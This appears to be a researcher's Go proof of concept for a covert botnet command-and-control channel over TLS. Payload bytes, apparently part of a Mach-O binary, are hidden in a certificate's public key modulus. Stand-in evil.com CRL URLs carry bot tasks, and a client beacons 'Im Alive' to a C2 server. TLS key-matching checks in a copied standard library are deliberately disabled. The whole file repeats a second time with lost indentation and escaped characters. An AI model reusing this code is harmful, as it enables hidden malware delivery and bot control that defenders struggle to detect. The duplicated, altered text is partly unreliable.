sysopfb/covert_modulus_example.go Secret

## covert_modulus_example.go
//Part of Server code
	priv, _ := rsa.GenerateKey(rand.Reader, 4096)
	test := "z/rt/gcAAAEDAACAAgAAAA8AAACwBAAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA2AEAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAcAAAAFAAAABQAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAGAPAAABAAAAKgAAAAAAAABgDwAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAig8AAAEAAAAGAAAAAAAAAIoPAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAACQDwAAAQAAABoAAAAAAAAAkA8AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19URVhUAAAAAAAAAAAAAKoPAAABAAAADQAAAAAAAACqDwAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAF9fdW53aW5kX2luZm8AAAA="
	data, _ := base64.StdEncoding.DecodeString(test)
	_, ca, pv := helper.GenCertWithPubMod("EICAR", data, []string{"http://evil.com/ca1.crl", "http://evil2.com/ca2.crl"}, priv)
	cert, err := customtls.X509KeyPair(ca, pv)
	if err != nil {
		log.Fatalf("server: loadkeys: %s", err)
	}
	cert2 := tls.Certificate{Certificate: cert.Certificate, PrivateKey: cert.PrivateKey, OCSPStaple: cert.OCSPStaple, SignedCertificateTimestamps: cert.SignedCertificateTimestampList, Leaf: cert.Leaf}
	config := tls.Config{Certificates: []tls.Certificate{cert2}}
	config.InsecureSkipVerify = true
	config.VerifyPeerCertificate = verifyHook
	config.ClientAuth = tls.RequireAnyClientCert
	config.Rand = rand.Reader
	service := "0.0.0.0:4433"

//In order to do that I had to comment out the private key and public key protections in the standard GO TLS package
//customtls
//From common.go
type Certificate struct {
	Certificate [][]byte
	PrivateKey  crypto.PrivateKey // supported types: *rsa.PrivateKey, *ecdsa.PrivateKey
	// OCSPStaple contains an optional OCSP response which will be served
	// to clients that request it.
	OCSPStaple []byte
	// SignedCertificateTimestampList contains an optional encoded
	// SignedCertificateTimestampList structure which will be
	// served to clients that request it.
	SignedCertificateTimestampList [][]byte
	// Leaf is the parsed form of the leaf certificate, which may be
	// initialized using x509.ParseCertificate to reduce per-handshake
	// processing for TLS clients doing client authentication. If nil, the
	// leaf certificate will be parsed as needed.
	Leaf *x509.Certificate
}

// LoadX509KeyPair reads and parses a public/private key pair from a pair
// of files. The files must contain PEM encoded data. The certificate file
// may contain intermediate certificates following the leaf certificate to
// form a certificate chain. On successful return, Certificate.Leaf will
// be nil because the parsed form of the certificate is not retained.
func LoadX509KeyPair(certFile, keyFile string) (Certificate, error) {
	certPEMBlock, err := ioutil.ReadFile(certFile)
	if err != nil {
		return Certificate{}, err
	}
	keyPEMBlock, err := ioutil.ReadFile(keyFile)
	if err != nil {
		return Certificate{}, err
	}
	return X509KeyPair(certPEMBlock, keyPEMBlock)
}

// X509KeyPair parses a public/private key pair from a pair of
// PEM encoded data. On successful return, Certificate.Leaf will be nil because
// the parsed form of the certificate is not retained.
func X509KeyPair(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
	fail := func(err error) (Certificate, error) { return Certificate{}, err }

	var cert Certificate
	var skippedBlockTypes []string
	for {
		var certDERBlock *pem.Block
		certDERBlock, certPEMBlock = pem.Decode(certPEMBlock)
		if certDERBlock == nil {
			break
		}
		if certDERBlock.Type == "CERTIFICATE" {
			cert.Certificate = append(cert.Certificate, certDERBlock.Bytes)
		} else {
			skippedBlockTypes = append(skippedBlockTypes, certDERBlock.Type)
		}
	}

	if len(cert.Certificate) == 0 {
		if len(skippedBlockTypes) == 0 {
			return fail(errors.New("tls: failed to find any PEM data in certificate input"))
		}
		if len(skippedBlockTypes) == 1 && strings.HasSuffix(skippedBlockTypes[0], "PRIVATE KEY") {
			return fail(errors.New("tls: failed to find certificate PEM data in certificate input, but did find a private key; PEM inputs may have been switched"))
		}
		return fail(fmt.Errorf("tls: failed to find \"CERTIFICATE\" PEM block in certificate input after skipping PEM blocks of the following types: %v", skippedBlockTypes))
	}

	skippedBlockTypes = skippedBlockTypes[:0]
	var keyDERBlock *pem.Block
	for {
		keyDERBlock, keyPEMBlock = pem.Decode(keyPEMBlock)
		if keyDERBlock == nil {
			if len(skippedBlockTypes) == 0 {
				return fail(errors.New("tls: failed to find any PEM data in key input"))
			}
			if len(skippedBlockTypes) == 1 && skippedBlockTypes[0] == "CERTIFICATE" {
				return fail(errors.New("tls: found a certificate rather than a key in the PEM for the private key"))
			}
			return fail(fmt.Errorf("tls: failed to find PEM block with type ending in \"PRIVATE KEY\" in key input after skipping PEM blocks of the following types: %v", skippedBlockTypes))
		}
		if keyDERBlock.Type == "PRIVATE KEY" || strings.HasSuffix(keyDERBlock.Type, " PRIVATE KEY") {
			break
		}
		skippedBlockTypes = append(skippedBlockTypes, keyDERBlock.Type)
	}

	var err error
	cert.PrivateKey, err = parsePrivateKey(keyDERBlock.Bytes)
	if err != nil {
		return fail(err)
	}

	// We don't need to parse the public key for TLS, but we so do anyway
	// to check that it looks sane and matches the private key.
	x509Cert, err := x509.ParseCertificate(cert.Certificate[0])
	if err != nil {
		return fail(err)
	}

	switch pub := x509Cert.PublicKey.(type) {
	case *rsa.PublicKey:
		priv, ok := cert.PrivateKey.(*rsa.PrivateKey)
		if !ok {
			return fail(errors.New("tls: private key type does not match public key type"))
		}
		if pub.N.Cmp(priv.N) != 0 {
			//return fail(errors.New("tls: private key does not match public key"))
		}
	case *ecdsa.PublicKey:
		priv, ok := cert.PrivateKey.(*ecdsa.PrivateKey)
		if !ok {
			return fail(errors.New("tls: private key type does not match public key type"))
		}
		if pub.X.Cmp(priv.X) != 0 || pub.Y.Cmp(priv.Y) != 0 {
			//return fail(errors.New("tls: private key does not match public key"))
		}
	default:
		return fail(errors.New("tls: unknown public key algorithm"))
	}

	return cert, nil
}

// Attempt to parse the given private key DER block. OpenSSL 0.9.8 generates
// PKCS#1 private keys by default, while OpenSSL 1.0.0 generates PKCS#8 keys.
// OpenSSL ecparam generates SEC1 EC private keys for ECDSA. We try all three.
func parsePrivateKey(der []byte) (crypto.PrivateKey, error) {
	if key, err := x509.ParsePKCS1PrivateKey(der); err == nil {
		return key, nil
	}
	if key, err := x509.ParsePKCS8PrivateKey(der); err == nil {
		switch key := key.(type) {
		case *rsa.PrivateKey, *ecdsa.PrivateKey:
			return key, nil
		default:
			return nil, errors.New("tls: found unknown private key type in PKCS#8 wrapping")
		}
	}
	if key, err := x509.ParseECPrivateKey(der); err == nil {
		return key, nil
	}

	return nil, errors.New("tls: failed to parse private key")
}


//Client code
func verifyHook(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
	cert, _ := x509.ParseCertificate(rawCerts[0])
	fmt.Println(cert.PublicKey.(*rsa.PublicKey).N.Bytes())
	return nil
}

type settings struct {
	c2     string
	port   string
	botnet string
	priv   *rsa.PrivateKey
}

func SendData(settings settings, data string) {
	_, ca, pv := helper.GenCertWithString(settings.botnet, data, settings.priv)
	c2 := settings.c2 + ":" + settings.port
	cert, err := tls.X509KeyPair(ca, pv)
	if err != nil {
		log.Fatalf("server: loadkeys: %s", err)
	}
	config := tls.Config{Certificates: []tls.Certificate{cert}, VerifyPeerCertificate: verifyHook, InsecureSkipVerify: true}

	conn, err := tls.Dial("tcp", c2, &config)
	if err != nil {
		log.Fatalf("client: dial: %s", err)
	}
  defer conn.Close()
	log.Println("client: connected to: ", conn.RemoteAddr())

	state := conn.ConnectionState()
	for _, v := range state.PeerCertificates {
		fmt.Println("Tasks: ", v.CRLDistributionPoints)
	}
	log.Println("client: handshake: ", state.HandshakeComplete)
	log.Println("client: mutual: ", state.NegotiatedProtocolIsMutual)

	log.Print("client: exiting")
}

func main() {
	priv, _ := rsa.GenerateKey(rand.Reader, 4096)
	c2_settings := settings{"127.0.0.1", "4433", "EICAR", priv}
	SendData(c2_settings, "Im Alive")
}

//Portion of helper code for replacing the public key
	pub := &priv.PublicKey
	ca_b, err := x509.CreateCertificate(rand.Reader, ca, ca, pub, priv)
	privPem := pem.EncodeToMemory(&pem.Block{
		Type:  "RSA PRIVATE KEY",
		Bytes: x509.MarshalPKCS1PrivateKey(priv),
	})
	//Replace the public key modulus
	bs := pub.N.Bytes()
	newTest := bytes.Replace(ca_b, bs, data, 1)

	if err != nil {
		log.Fatalf("create cert failed %#v", err)
		panic("Cert Creation Error")
	}

	certPem := pem.EncodeToMemory(&pem.Block{
		Type:  "CERTIFICATE",
		Bytes: newTest,
	})
	//Part of Server code
	priv, _ := rsa.GenerateKey(rand.Reader, 4096)
	test := "z/rt/gcAAAEDAACAAgAAAA8AAACwBAAAhQAgAAAAAAAZAAAASAAAAF9fUEFHRVpFUk8AAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZAAAA2AEAAF9fVEVYVAAAAAAAAAAAAAAAAAAAAQAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAcAAAAFAAAABQAAAAAAAABfX3RleHQAAAAAAAAAAAAAX19URVhUAAAAAAAAAAAAAGAPAAABAAAAKgAAAAAAAABgDwAABAAAAAAAAAAAAAAAAAQAgAAAAAAAAAAAAAAAAF9fc3R1YnMAAAAAAAAAAABfX1RFWFQAAAAAAAAAAAAAig8AAAEAAAAGAAAAAAAAAIoPAAABAAAAAAAAAAAAAAAIBACAAAAAAAYAAAAAAAAAX19zdHViX2hlbHBlcgAAAF9fVEVYVAAAAAAAAAAAAACQDwAAAQAAABoAAAAAAAAAkA8AAAIAAAAAAAAAAAAAAAAEAIAAAAAAAAAAAAAAAABfX2NzdHJpbmcAAAAAAAAAX19URVhUAAAAAAAAAAAAAKoPAAABAAAADQAAAAAAAACqDwAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAF9fdW53aW5kX2luZm8AAAA="
	data, _ := base64.StdEncoding.DecodeString(test)
	_, ca, pv := helper.GenCertWithPubMod("EICAR", data, []string{"http://evil.com/ca1.crl", "http://evil2.com/ca2.crl"}, priv)
	cert, err := customtls.X509KeyPair(ca, pv)
	if err != nil {
	log.Fatalf("server: loadkeys: %s", err)
	}
	cert2 := tls.Certificate{Certificate: cert.Certificate, PrivateKey: cert.PrivateKey, OCSPStaple: cert.OCSPStaple, SignedCertificateTimestamps: cert.SignedCertificateTimestampList, Leaf: cert.Leaf}
	config := tls.Config{Certificates: []tls.Certificate{cert2}}
	config.InsecureSkipVerify = true
	config.VerifyPeerCertificate = verifyHook
	config.ClientAuth = tls.RequireAnyClientCert
	config.Rand = rand.Reader
	service := "0.0.0.0:4433"

	//In order to do that I had to comment out the private key and public key protections in the standard GO TLS package
	//customtls
	//From common.go
	type Certificate struct {
	Certificate [][]byte
	PrivateKey crypto.PrivateKey // supported types: rsa.PrivateKey, ecdsa.PrivateKey
	// OCSPStaple contains an optional OCSP response which will be served
	// to clients that request it.
	OCSPStaple []byte
	// SignedCertificateTimestampList contains an optional encoded
	// SignedCertificateTimestampList structure which will be
	// served to clients that request it.
	SignedCertificateTimestampList [][]byte
	// Leaf is the parsed form of the leaf certificate, which may be
	// initialized using x509.ParseCertificate to reduce per-handshake
	// processing for TLS clients doing client authentication. If nil, the
	// leaf certificate will be parsed as needed.
	Leaf *x509.Certificate
	}

	// LoadX509KeyPair reads and parses a public/private key pair from a pair
	// of files. The files must contain PEM encoded data. The certificate file
	// may contain intermediate certificates following the leaf certificate to
	// form a certificate chain. On successful return, Certificate.Leaf will
	// be nil because the parsed form of the certificate is not retained.
	func LoadX509KeyPair(certFile, keyFile string) (Certificate, error) {
	certPEMBlock, err := ioutil.ReadFile(certFile)
	if err != nil {
	return Certificate{}, err
	}
	keyPEMBlock, err := ioutil.ReadFile(keyFile)
	if err != nil {
	return Certificate{}, err
	}
	return X509KeyPair(certPEMBlock, keyPEMBlock)
	}

	// X509KeyPair parses a public/private key pair from a pair of
	// PEM encoded data. On successful return, Certificate.Leaf will be nil because
	// the parsed form of the certificate is not retained.
	func X509KeyPair(certPEMBlock, keyPEMBlock []byte) (Certificate, error) {
	fail := func(err error) (Certificate, error) { return Certificate{}, err }

	var cert Certificate
	var skippedBlockTypes []string
	for {
	var certDERBlock *pem.Block
	certDERBlock, certPEMBlock = pem.Decode(certPEMBlock)
	if certDERBlock == nil {
	break
	}
	if certDERBlock.Type == "CERTIFICATE" {
	cert.Certificate = append(cert.Certificate, certDERBlock.Bytes)
	} else {
	skippedBlockTypes = append(skippedBlockTypes, certDERBlock.Type)
	}
	}

	if len(cert.Certificate) == 0 {
	if len(skippedBlockTypes) == 0 {
	return fail(errors.New("tls: failed to find any PEM data in certificate input"))
	}
	if len(skippedBlockTypes) == 1 && strings.HasSuffix(skippedBlockTypes[0], "PRIVATE KEY") {
	return fail(errors.New("tls: failed to find certificate PEM data in certificate input, but did find a private key; PEM inputs may have been switched"))
	}
	return fail(fmt.Errorf("tls: failed to find \"CERTIFICATE\" PEM block in certificate input after skipping PEM blocks of the following types: %v", skippedBlockTypes))
	}

	skippedBlockTypes = skippedBlockTypes[:0]
	var keyDERBlock *pem.Block
	for {
	keyDERBlock, keyPEMBlock = pem.Decode(keyPEMBlock)
	if keyDERBlock == nil {
	if len(skippedBlockTypes) == 0 {
	return fail(errors.New("tls: failed to find any PEM data in key input"))
	}
	if len(skippedBlockTypes) == 1 && skippedBlockTypes[0] == "CERTIFICATE" {
	return fail(errors.New("tls: found a certificate rather than a key in the PEM for the private key"))
	}
	return fail(fmt.Errorf("tls: failed to find PEM block with type ending in \"PRIVATE KEY\" in key input after skipping PEM blocks of the following types: %v", skippedBlockTypes))
	}
	if keyDERBlock.Type == "PRIVATE KEY" \|\| strings.HasSuffix(keyDERBlock.Type, " PRIVATE KEY") {
	break
	}
	skippedBlockTypes = append(skippedBlockTypes, keyDERBlock.Type)
	}

	var err error
	cert.PrivateKey, err = parsePrivateKey(keyDERBlock.Bytes)
	if err != nil {
	return fail(err)
	}

	// We don't need to parse the public key for TLS, but we so do anyway
	// to check that it looks sane and matches the private key.
	x509Cert, err := x509.ParseCertificate(cert.Certificate[0])
	if err != nil {
	return fail(err)
	}

	switch pub := x509Cert.PublicKey.(type) {
	case *rsa.PublicKey:
	priv, ok := cert.PrivateKey.(*rsa.PrivateKey)
	if !ok {
	return fail(errors.New("tls: private key type does not match public key type"))
	}
	if pub.N.Cmp(priv.N) != 0 {
	//return fail(errors.New("tls: private key does not match public key"))
	}
	case *ecdsa.PublicKey:
	priv, ok := cert.PrivateKey.(*ecdsa.PrivateKey)
	if !ok {
	return fail(errors.New("tls: private key type does not match public key type"))
	}
	if pub.X.Cmp(priv.X) != 0 \|\| pub.Y.Cmp(priv.Y) != 0 {
	//return fail(errors.New("tls: private key does not match public key"))
	}
	default:
	return fail(errors.New("tls: unknown public key algorithm"))
	}

	return cert, nil
	}

	// Attempt to parse the given private key DER block. OpenSSL 0.9.8 generates
	// PKCS#1 private keys by default, while OpenSSL 1.0.0 generates PKCS#8 keys.
	// OpenSSL ecparam generates SEC1 EC private keys for ECDSA. We try all three.
	func parsePrivateKey(der []byte) (crypto.PrivateKey, error) {
	if key, err := x509.ParsePKCS1PrivateKey(der); err == nil {
	return key, nil
	}
	if key, err := x509.ParsePKCS8PrivateKey(der); err == nil {
	switch key := key.(type) {
	case rsa.PrivateKey, ecdsa.PrivateKey:
	return key, nil
	default:
	return nil, errors.New("tls: found unknown private key type in PKCS#8 wrapping")
	}
	}
	if key, err := x509.ParseECPrivateKey(der); err == nil {
	return key, nil
	}

	return nil, errors.New("tls: failed to parse private key")
	}


	//Client code
	func verifyHook(rawCerts [][]byte, verifiedChains [][]*x509.Certificate) error {
	cert, _ := x509.ParseCertificate(rawCerts[0])
	fmt.Println(cert.PublicKey.(*rsa.PublicKey).N.Bytes())
	return nil
	}

	type settings struct {
	c2 string
	port string
	botnet string
	priv *rsa.PrivateKey
	}

	func SendData(settings settings, data string) {
	_, ca, pv := helper.GenCertWithString(settings.botnet, data, settings.priv)
	c2 := settings.c2 + ":" + settings.port
	cert, err := tls.X509KeyPair(ca, pv)
	if err != nil {
	log.Fatalf("server: loadkeys: %s", err)
	}
	config := tls.Config{Certificates: []tls.Certificate{cert}, VerifyPeerCertificate: verifyHook, InsecureSkipVerify: true}

	conn, err := tls.Dial("tcp", c2, &config)
	if err != nil {
	log.Fatalf("client: dial: %s", err)
	}
	defer conn.Close()
	log.Println("client: connected to: ", conn.RemoteAddr())

	state := conn.ConnectionState()
	for _, v := range state.PeerCertificates {
	fmt.Println("Tasks: ", v.CRLDistributionPoints)
	}
	log.Println("client: handshake: ", state.HandshakeComplete)
	log.Println("client: mutual: ", state.NegotiatedProtocolIsMutual)

	log.Print("client: exiting")
	}

	func main() {
	priv, _ := rsa.GenerateKey(rand.Reader, 4096)
	c2_settings := settings{"127.0.0.1", "4433", "EICAR", priv}
	SendData(c2_settings, "Im Alive")
	}

	//Portion of helper code for replacing the public key
	pub := &priv.PublicKey
	ca_b, err := x509.CreateCertificate(rand.Reader, ca, ca, pub, priv)
	privPem := pem.EncodeToMemory(&pem.Block{
	Type: "RSA PRIVATE KEY",
	Bytes: x509.MarshalPKCS1PrivateKey(priv),
	})
	//Replace the public key modulus
	bs := pub.N.Bytes()
	newTest := bytes.Replace(ca_b, bs, data, 1)

	if err != nil {
	log.Fatalf("create cert failed %#v", err)
	panic("Cert Creation Error")
	}

	certPem := pem.EncodeToMemory(&pem.Block{
	Type: "CERTIFICATE",
	Bytes: newTest,
	})